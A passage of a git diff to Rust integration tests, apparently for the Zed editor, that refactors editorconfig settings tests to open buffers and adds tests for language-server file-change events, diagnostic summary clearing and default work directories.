-43,7 +43,7 @@ fn test_multi_len_chars_normalization() { let mut label = CodeLabel::new( "myElˇ (parameter) myElˇ: {\n foo: string;\n}".to_string(), 0..6, - vec![(0..6, HighlightId(1))], + vec![(0..6, HighlightId::new(1))], ); ensure_uniform_list_compatible_label(&mut label); assert_eq!( @@ -51,7 +51,7 @@ fn test_multi_len_chars_normalization() { CodeLabel::new( "myElˇ (parameter) myElˇ: { foo: string; }".to_string(), 0..6, - vec![(0..6, HighlightId(1))], + vec![(0..6, HighlightId::new(1))], ) ); } diff --git a/crates/project/tests/integration/project_tests.rs b/crates/project/tests/integration/project_tests.rs index 9bd0be45ae3fa1e66e8af2c43657ba039045ecef..d6c2ce37c9e60e17bd43c3f6c3ad10cde52b4bec 100644 --- a/crates/project/tests/integration/project_tests.rs +++ b/crates/project/tests/integration/project_tests.rs @@ -26,17 +26,17 @@ use buffer_diff::{ }; use collections::{BTreeSet, HashMap, HashSet}; use encoding_rs; -use fs::FakeFs; +use fs::{FakeFs, PathEventKind}; use futures::{StreamExt, future}; use git::{ GitHostingProviderRegistry, repository::{RepoPath, repo_path}, - status::{FileStatus, StatusCode, TrackedStatus}, + status::{DiffStat, FileStatus, StatusCode, TrackedStatus}, }; use git2::RepositoryInitOptions; use gpui::{ App, AppContext, BackgroundExecutor, BorrowAppContext, Entity, FutureExt, SharedString, Task, - UpdateGlobal, + TestAppContext, UpdateGlobal, }; use itertools::Itertools; use language::{ @@ -44,7 +44,7 @@ use language::{ DiagnosticSourceKind, DiskState, FakeLspAdapter, Language, LanguageConfig, LanguageMatcher, LanguageName, LineEnding, ManifestName, ManifestProvider, ManifestQuery, OffsetRangeExt, Point, ToPoint, Toolchain, ToolchainList, ToolchainLister, ToolchainMetadata, - language_settings::{LanguageSettingsContent, language_settings}, + language_settings::{LanguageSettings, LanguageSettingsContent}, markdown_lang, rust_lang, tree_sitter_typescript, }; use lsp::{ @@ -76,7 +76,7 @@ use std::{ path::{Path, PathBuf}, rc::Rc, str::FromStr, - sync::{Arc, OnceLock}, + sync::{Arc, OnceLock, atomic}, task::Poll, time::Duration, }; @@ -126,6 +126,63 @@ async fn test_block_via_smol(cx: &mut gpui::TestAppContext) { task.await; } +#[gpui::test] +async fn test_default_session_work_dirs_prefers_directory_worktrees_over_single_file_parents( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/root"), + json!({ + "dir-project": { + "src": { + "main.rs": "fn main() {}" + } + }, + "single-file.rs": "fn helper() {}" + }), + ) + .await; + + let project = Project::test( + fs, + [ + Path::new(path!("/root/single-file.rs")), + Path::new(path!("/root/dir-project")), + ], + cx, + ) + .await; + + let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx)); + let ordered_paths = work_dirs.ordered_paths().cloned().collect::>(); + + assert_eq!( + ordered_paths, + vec![ + PathBuf::from(path!("/root/dir-project")), + PathBuf::from(path!("/root")), + ] + ); +} + +#[gpui::test] +async fn test_default_session_work_dirs_falls_back_to_home_for_empty_project( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + let project = Project::test(fs, [], cx).await; + + let work_dirs = project.read_with(cx, |project, cx| project.default_path_list(cx)); + let ordered_paths = work_dirs.ordered_paths().cloned().collect::>(); + + assert_eq!(ordered_paths, vec![paths::home_dir().to_path_buf()]); +} + // NOTE: // While POSIX symbolic links are somewhat supported on Windows, they are an opt in by the user, and thus // we assume that they are not supported out of the box. @@ -239,50 +296,43 @@ async fn test_editorconfig_support(cx: &mut gpui::TestAppContext) { cx.executor().run_until_parked(); - cx.update(|cx| { - let tree = worktree.read(cx); - let settings_for = |path: &str| { - let file_entry = tree.entry_for_path(rel_path(path)).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - language_settings(Some(file_language.name()), Some(&file), cx).into_owned() - }; + let settings_for = async |path: &str, cx: &mut TestAppContext| -> LanguageSettings { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path(path)), cx) + }) + .await + .unwrap(); + cx.update(|cx| LanguageSettings::for_buffer(&buffer.read(cx), cx).into_owned()) + }; - let settings_a = settings_for("a.rs"); - let settings_b = settings_for("b/b.rs"); - let settings_c = settings_for("c.js"); - let settings_d = settings_for("d/d.rs"); - let settings_readme = settings_for("README.json"); + let settings_a = settings_for("a.rs", cx).await; + let settings_b = settings_for("b/b.rs", cx).await; + let settings_c = settings_for("c.js", cx).await; + let settings_d = settings_for("d/d.rs", cx).await; + let settings_readme = settings_for("README.json", cx).await; + // .editorconfig overrides .zed/settings + assert_eq!(Some(settings_a.tab_size), NonZeroU32::new(3)); + assert_eq!(settings_a.hard_tabs, true); + assert_eq!(settings_a.ensure_final_newline_on_save, true); + assert_eq!(settings_a.remove_trailing_whitespace_on_save, true); + assert_eq!(settings_a.preferred_line_length, 120); - // .editorconfig overrides .zed/settings - assert_eq!(Some(settings_a.tab_size), NonZeroU32::new(3)); - assert_eq!(settings_a.hard_tabs, true); - assert_eq!(settings_a.ensure_final_newline_on_save, true); - assert_eq!(settings_a.remove_trailing_whitespace_on_save, true); - assert_eq!(settings_a.preferred_line_length, 120); + // .editorconfig in b/ overrides .editorconfig in root + assert_eq!(Some(settings_b.tab_size), NonZeroU32::new(2)); - // .editorconfig in subdirectory overrides .editorconfig in root - assert_eq!(Some(settings_b.tab_size), NonZeroU32::new(2)); - assert_eq!(Some(settings_d.tab_size), NonZeroU32::new(1)); + // .editorconfig in subdirectory overrides .editorconfig in root + assert_eq!(Some(settings_d.tab_size), NonZeroU32::new(1)); - // "indent_size" is not set, so "tab_width" is used - assert_eq!(Some(settings_c.tab_size), NonZeroU32::new(10)); + // "indent_size" is not set, so "tab_width" is used + assert_eq!(Some(settings_c.tab_size), NonZeroU32::new(10)); - // When max_line_length is "off", default to .zed/settings.json - assert_eq!(settings_b.preferred_line_length, 64); - assert_eq!(settings_c.preferred_line_length, 64); + // When max_line_length is "off", default to .zed/settings.json + assert_eq!(settings_b.preferred_line_length, 64); + assert_eq!(settings_c.preferred_line_length, 64); - // README.md should not be affected by .editorconfig's globe "*.rs" - assert_eq!(Some(settings_readme.tab_size), NonZeroU32::new(8)); - }); + // README.md should not be affected by .editorconfig's globe "*.rs" + assert_eq!(Some(settings_readme.tab_size), NonZeroU32::new(8)); } #[gpui::test] @@ -316,37 +366,28 @@ async fn test_external_editorconfig_support(cx: &mut gpui::TestAppContext) { let worktree = project.update(cx, |project, cx| project.worktrees(cx).next().unwrap()); cx.executor().run_until_parked(); + let settings_for = async |path: &str, cx: &mut TestAppContext| -> LanguageSettings { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path(path)), cx) + }) + .await + .unwrap(); + cx.update(|cx| LanguageSettings::for_buffer(&buffer.read(cx), cx).into_owned()) + }; - cx.update(|cx| { - let tree = worktree.read(cx); - let settings_for = |path: &str| { - let file_entry = tree.entry_for_path(rel_path(path)).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - language_settings(Some(file_language.name()), Some(&file), cx).into_owned() - }; - - let settings_rs = settings_for("main.rs"); - let settings_md = settings_for("README.md"); - let settings_txt = settings_for("other.txt"); + let settings_rs = settings_for("main.rs", cx).await; + let settings_md = settings_for("README.md", cx).await; + let settings_txt = settings_for("other.txt", cx).await; - // main.rs gets indent_size = 2 from parent's external .editorconfig - assert_eq!(Some(settings_rs.tab_size), NonZeroU32::new(2)); + // main.rs gets indent_size = 2 from parent's external .editorconfig + assert_eq!(Some(settings_rs.tab_size), NonZeroU32::new(2)); - // README.md gets indent_size = 3 from internal worktree .editorconfig - assert_eq!(Some(settings_md.tab_size), NonZeroU32::new(3)); + // README.md gets indent_size = 3 from internal worktree .editorconfig + assert_eq!(Some(settings_md.tab_size), NonZeroU32::new(3)); - // other.txt gets indent_size = 4 from grandparent's external .editorconfig - assert_eq!(Some(settings_txt.tab_size), NonZeroU32::new(4)); - }); + // other.txt gets indent_size = 4 from grandparent's external .editorconfig + assert_eq!(Some(settings_txt.tab_size), NonZeroU32::new(4)); } #[gpui::test] @@ -375,24 +416,14 @@ async fn test_internal_editorconfig_root_stops_traversal(cx: &mut gpui::TestAppC cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("src/file.rs")), cx) + }) + .await + .unwrap(); cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree - .entry_for_path(rel_path("src/file.rs")) - .unwrap() - .clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); - + let settings = LanguageSettings::for_buffer(buffer.read(cx), cx).into_owned(); assert_eq!(Some(settings.tab_size), NonZeroU32::new(2)); }); } @@ -423,20 +454,15 @@ async fn test_external_editorconfig_root_stops_traversal(cx: &mut gpui::TestAppC cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs gets indent_size = 2 from worktree's root config, NOT 99 from parent assert_eq!(Some(settings.tab_size), NonZeroU32::new(2)); @@ -471,20 +497,15 @@ async fn test_external_editorconfig_root_in_parent_stops_traversal(cx: &mut gpui cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs gets indent_size = 4 from parent's root config, NOT 99 from grandparent assert_eq!(Some(settings.tab_size), NonZeroU32::new(4)); @@ -527,30 +548,24 @@ async fn test_external_editorconfig_shared_across_worktrees(cx: &mut gpui::TestA cx.executor().run_until_parked(); - cx.update(|cx| { - let worktrees: Vec<_> = project.read(cx).worktrees(cx).collect(); - assert_eq!(worktrees.len(), 2); + let worktrees: Vec<_> = cx.update(|cx| project.read(cx).worktrees(cx).collect()); + assert_eq!(worktrees.len(), 2); - for worktree in worktrees { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = - language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + for worktree in worktrees { + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + + cx.update(|cx| { + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Both worktrees should get indent_size = 5 from shared parent .editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(5)); - } - }); + }); + } } #[gpui::test] @@ -580,20 +595,15 @@ async fn test_external_editorconfig_not_loaded_without_internal_config( cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // file.rs should have default tab_size = 4, NOT 99 from parent's external .editorconfig // because without an internal .editorconfig, external configs are not loaded @@ -627,20 +637,15 @@ async fn test_external_editorconfig_modification_triggers_refresh(cx: &mut gpui: cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test initial settings: tab_size = 4 from parent's external .editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(4)); @@ -655,20 +660,15 @@ async fn test_external_editorconfig_modification_triggers_refresh(cx: &mut gpui: cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test settings updated: tab_size = 8 assert_eq!(Some(settings.tab_size), NonZeroU32::new(8)); @@ -703,21 +703,16 @@ async fn test_adding_worktree_discovers_external_editorconfigs(cx: &mut gpui::Te cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + let id = project.worktrees(cx).next().unwrap().read(cx).id(); + project.open_buffer((id, rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let worktree = project.read(cx).worktrees(cx).next().unwrap(); - let tree = worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx).into_owned(); // Test existing worktree has tab_size = 7 assert_eq!(Some(settings.tab_size), NonZeroU32::new(7)); @@ -732,20 +727,15 @@ async fn test_adding_worktree_discovers_external_editorconfigs(cx: &mut gpui::Te cx.executor().run_until_parked(); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((new_worktree.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = new_worktree.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, new_worktree.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Verify new worktree also has tab_size = 7 from shared parent editorconfig assert_eq!(Some(settings.tab_size), NonZeroU32::new(7)); @@ -886,20 +876,15 @@ async fn test_shared_external_editorconfig_cleanup_with_multiple_worktrees( assert_eq!(watcher_paths.len(), 1); }); + let buffer = project + .update(cx, |project, cx| { + project.open_buffer((worktree_b.read(cx).id(), rel_path("file.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { - let tree = worktree_b.read(cx); - let file_entry = tree.entry_for_path(rel_path("file.rs")).unwrap().clone(); - let file = File::for_entry(file_entry, worktree_b.clone()); - let file_language = project - .read(cx) - .languages() - .load_language_for_file_path(file.path.as_std_path()); - let file_language = cx - .foreground_executor() - .block_on(file_language) - .expect("Failed to get file language"); - let file = file as _; - let settings = language_settings(Some(file_language.name()), Some(&file), cx).into_owned(); + let settings = LanguageSettings::for_buffer(&buffer.read(cx), cx); // Test worktree_b still has correct settings assert_eq!(Some(settings.tab_size), NonZeroU32::new(5)); @@ -1026,26 +1011,28 @@ async fn test_managing_project_specific_settings(cx: &mut gpui::TestAppContext) id_base: "local worktree tasks from directory \".zed\"".into(), }; - let all_tasks = cx - .update(|cx| { - let tree = worktree.read(cx); - - let file_a = File::for_entry( - tree.entry_for_path(rel_path("a/a.rs")).unwrap().clone(), - worktree.clone(), - ) as _; - let settings_a = language_settings(None, Some(&file_a), cx); - let file_b = File::for_entry( - tree.entry_for_path(rel_path("b/b.rs")).unwrap().clone(), - worktree.clone(), - ) as _; - let settings_b = language_settings(None, Some(&file_b), cx); + let buffer_a = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("a/a.rs")), cx) + }) + .await + .unwrap(); + let buffer_b = project + .update(cx, |project, cx| { + project.open_buffer((worktree.read(cx).id(), rel_path("b/b.rs")), cx) + }) + .await + .unwrap(); + cx.update(|cx| { + let settings_a = LanguageSettings::for_buffer(&buffer_a.read(cx), cx); + let settings_b = LanguageSettings::for_buffer(&buffer_b.read(cx), cx); - assert_eq!(settings_a.tab_size.get(), 8); - assert_eq!(settings_b.tab_size.get(), 2); + assert_eq!(settings_a.tab_size.get(), 8); + assert_eq!(settings_b.tab_size.get(), 2); + }); - get_all_tasks(&project, task_contexts.clone(), cx) - }) + let all_tasks = cx + .update(|cx| get_all_tasks(&project, task_contexts.clone(), cx)) .await .into_iter() .map(|(source_kind, task)| { @@ -1784,7 +1771,7 @@ async fn test_managing_language_servers(cx: &mut gpui::TestAppContext) { DiagnosticSet::from_sorted_entries( vec![DiagnosticEntry { diagnostic: Default::default(), - range: Anchor::MIN..Anchor::MAX, + range: Anchor::min_max_range_for_buffer(buffer.remote_id()), }], &buffer.snapshot(), ), @@ -2072,6 +2059,97 @@ async fn test_language_server_tilde_path(cx: &mut gpui::TestAppContext) { ); } +#[gpui::test] +async fn test_rescan_fs_change_is_reported_to_language_servers_as_changed( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree( + path!("/the-root"), + json!({ + "Cargo.lock": "", + "src": { + "a.rs": "", + } + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/the-root").as_ref()], cx).await; + let (language_registry, _lsp_store) = project.read_with(cx, |project, _| { + (project.languages().clone(), project.lsp_store()) + }); + language_registry.add(rust_lang()); + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + name: "the-language-server", + ..Default::default() + }, + ); + + cx.executor().run_until_parked(); + + project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/the-root/src/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + cx.executor().run_until_parked(); + + let file_changes = Arc::new(Mutex::new(Vec::new())); + fake_server + .request::( + lsp::RegistrationParams { + registrations: vec![lsp::Registration { + id: Default::default(), + method: "workspace/didChangeWatchedFiles".to_string(), + register_options: serde_json::to_value( + lsp::DidChangeWatchedFilesRegistrationOptions { + watchers: vec![lsp::FileSystemWatcher { + glob_pattern: lsp::GlobPattern::String( + path!("/the-root/Cargo.lock").to_string(), + ), + kind: None, + }], + }, + ) + .ok(), + }], + }, + DEFAULT_LSP_REQUEST_TIMEOUT, + ) + .await + .into_response() + .unwrap(); + fake_server.handle_notification::({ + let file_changes = file_changes.clone(); + move |params, _| { + let mut file_changes = file_changes.lock(); + file_changes.extend(params.changes); + } + }); + + cx.executor().run_until_parked(); + assert_eq!(mem::take(&mut *file_changes.lock()), &[]); + + fs.emit_fs_event(path!("/the-root/Cargo.lock"), Some(PathEventKind::Rescan)); + cx.executor().run_until_parked(); + + assert_eq!( + &*file_changes.lock(), + &[lsp::FileEvent { + uri: lsp::Uri::from_file_path(path!("/the-root/Cargo.lock")).unwrap(), + typ: lsp::FileChangeType::CHANGED, + }] + ); +} + #[gpui::test] async fn test_reporting_fs_changes_to_language_servers(cx: &mut gpui::TestAppContext) { init_test(cx); @@ -3601,13 +3679,273 @@ async fn test_diagnostics_from_multiple_language_servers(cx: &mut gpui::TestAppC .unwrap(); assert_eq!( - lsp_store.diagnostic_summary(false, cx), + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 2, + warning_count: 0, + } + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_worktree_entry_removal( + cx: &mut gpui::TestAppContext, +) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "one", "b.rs": "two" })) + .await; + + let project = Project::test(fs.clone(), [Path::new(path!("/dir"))], cx).await; + let lsp_store = project.read_with(cx, |project, _| project.lsp_store()); + + lsp_store.update(cx, |lsp_store, cx| { + lsp_store + .update_diagnostic_entries( + LanguageServerId(0), + Path::new(path!("/dir/a.rs")).to_owned(), + None, + None, + vec![DiagnosticEntry { + range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)), + diagnostic: Diagnostic { + severity: DiagnosticSeverity::ERROR, + is_primary: true, + message: "error in a".to_string(), + source_kind: DiagnosticSourceKind::Pushed, + ..Diagnostic::default() + }, + }], + cx, + ) + .unwrap(); + lsp_store + .update_diagnostic_entries( + LanguageServerId(0), + Path::new(path!("/dir/b.rs")).to_owned(), + None, + None, + vec![DiagnosticEntry { + range: Unclipped(PointUtf16::new(0, 0))..Unclipped(PointUtf16::new(0, 3)), + diagnostic: Diagnostic { + severity: DiagnosticSeverity::WARNING, + is_primary: true, + message: "warning in b".to_string(), + source_kind: DiagnosticSourceKind::Pushed, + ..Diagnostic::default() + }, + }], + cx, + ) + .unwrap(); + + assert_eq!( + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 1, + warning_count: 1, + } + ); + }); + + fs.remove_file(path!("/dir/a.rs").as_ref(), Default::default()) + .await + .unwrap(); + cx.executor().run_until_parked(); + + lsp_store.update(cx, |lsp_store, cx| { + assert_eq!( + lsp_store.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 0, + warning_count: 1, + }, + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_server_restart(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "x" })).await; + + let project = Project::test(fs, [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang()); + let mut fake_servers = language_registry.register_fake_lsp("Rust", FakeLspAdapter::default()); + + let (buffer, _handle) = project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + fake_server.notify::(lsp::PublishDiagnosticsParams { + uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(), + version: None, + diagnostics: vec![lsp::Diagnostic { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 1)), + severity: Some(lsp::DiagnosticSeverity::ERROR), + message: "error before restart".to_string(), + ..Default::default() + }], + }); + cx.executor().run_until_parked(); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 1, + warning_count: 0, + } + ); + }); + + let mut events = cx.events(&project); + + project.update(cx, |project, cx| { + project.restart_language_servers_for_buffers(vec![buffer.clone()], HashSet::default(), cx); + }); + cx.executor().run_until_parked(); + + let mut received_diagnostics_updated = false; + while let Some(Some(event)) = + futures::FutureExt::now_or_never(futures::StreamExt::next(&mut events)) + { + if matches!(event, Event::DiagnosticsUpdated { .. }) { + received_diagnostics_updated = true; + } + } + assert!( + received_diagnostics_updated, + "DiagnosticsUpdated event should be emitted when a language server is stopped" + ); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), + DiagnosticSummary { + error_count: 0, + warning_count: 0, + } + ); + }); +} + +#[gpui::test] +async fn test_diagnostic_summaries_cleared_on_buffer_reload(cx: &mut gpui::TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.executor()); + fs.insert_tree(path!("/dir"), json!({ "a.rs": "one two three" })) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + + let language_registry = project.read_with(cx, |project, _| project.languages().clone()); + language_registry.add(rust_lang()); + let pull_count = Arc::new(atomic::AtomicUsize::new(0)); + let closure_pull_count = pull_count.clone(); + let mut fake_servers = language_registry.register_fake_lsp( + "Rust", + FakeLspAdapter { + capabilities: lsp::ServerCapabilities { + diagnostic_provider: Some(lsp::DiagnosticServerCapabilities::Options( + lsp::DiagnosticOptions { + identifier: Some("test-reload".to_string()), + inter_file_dependencies: true, + workspace_diagnostics: false, + work_done_progress_options: Default::default(), + }, + )), + ..lsp::ServerCapabilities::default() + }, + initializer: Some(Box::new(move |fake_server| { + let pull_count = closure_pull_count.clone(); + fake_server.set_request_handler::( + move |_, _| { + let pull_count = pull_count.clone(); + async move { + pull_count.fetch_add(1, atomic::Ordering::SeqCst); + Ok(lsp::DocumentDiagnosticReportResult::Report( + lsp::DocumentDiagnosticReport::Full( + lsp::RelatedFullDocumentDiagnosticReport { + related_documents: None, + full_document_diagnostic_report: + lsp::FullDocumentDiagnosticReport { + result_id: None, + items: Vec::new(), + }, + }, + ), + )) + } + }, + ); + })), + ..FakeLspAdapter::default() + }, + ); + + let (_buffer, _handle) = project + .update(cx, |project, cx| { + project.open_local_buffer_with_lsp(path!("/dir/a.rs"), cx) + }) + .await + .unwrap(); + + let fake_server = fake_servers.next().await.unwrap(); + cx.executor().run_until_parked(); + + // Publish initial diagnostics via the fake server. + fake_server.notify::(lsp::PublishDiagnosticsParams { + uri: Uri::from_file_path(path!("/dir/a.rs")).unwrap(), + version: None, + diagnostics: vec![lsp::Diagnostic { + range: lsp::Range::new(lsp::Position::new(0, 0), lsp::Position::new(0, 3)), + severity: Some(lsp::DiagnosticSeverity::ERROR), + message: "error in a".to_string(), + ..Default::default() + }], + }); + cx.executor().run_until_parked(); + + project.update(cx, |project, cx| { + assert_eq!( + project.diagnostic_summary(false, cx), DiagnosticSummary { - error_count: 2, + error_count: 1, warning_count: 0, } ); }); + + let pulls_before = pull_count.load(atomic::Ordering::SeqCst); + + // Change the file on disk. The FS event triggers buffer reload, + // which in turn triggers pull_diagnostics_for_buffer. + fs.save( + path!("/dir/a.rs").as_ref(), + &"fixed content".into(), + LineEnding::Unix, + ) + .await + .unwrap(); + cx.executor().run_until_parked(); + + let pulls_after = pull_count.load(atomic::Ordering::SeqCst); + assert!( + pulls_after > pulls_before, + "Expected document diagnostic pull after buffer reload (before={pulls_before}, after={pulls_after})" + ); } #[gpui::test] @@ -4110,7 +4448,7 @@ async fn test_definition(cx: &mut gpui::TestAppContext) { // Assert no new language server started cx.executor().run_until_parked(); - assert!(fake_servers.try_next().is_err()); + assert!(fake_servers.try_recv().is_err()); assert_eq!(definitions.len(), 1); let definition = definitions.pop().unwrap(); @@ -5359,6 +5697,52 @@ async fn test_rescan_and_remote_updates(cx: &mut gpui::TestAppContext) { }); } +#[cfg(target_os = "linux")] +#[gpui::test(retries = 5)] +async fn test_recreated_directory_receives_child_events(cx: &mut gpui::TestAppContext) { + init_test(cx); + cx.executor().allow_parking(); + + let dir = TempTree::new(json!({})); + let project = Project::test(Arc::new(RealFs::new(None, cx.executor())), [dir.path()], cx).await; + let tree = project.update(cx, |project, cx| project.worktrees(cx).next().unwrap()); + + tree.flush_fs_events(cx).await; + + let repro_dir = dir.path().join("repro"); + std::fs::create_dir(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_some()); + }); + + std::fs::remove_dir_all(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_none()); + }); + + std::fs::create_dir(&repro_dir).unwrap(); + tree.flush_fs_events(cx).await; + + cx.update(|cx| { + assert!(tree.read(cx).entry_for_path(rel_path("repro")).is_some()); + }); + + std::fs::write(repro_dir.join("repro-marker"), "").unwrap(); + 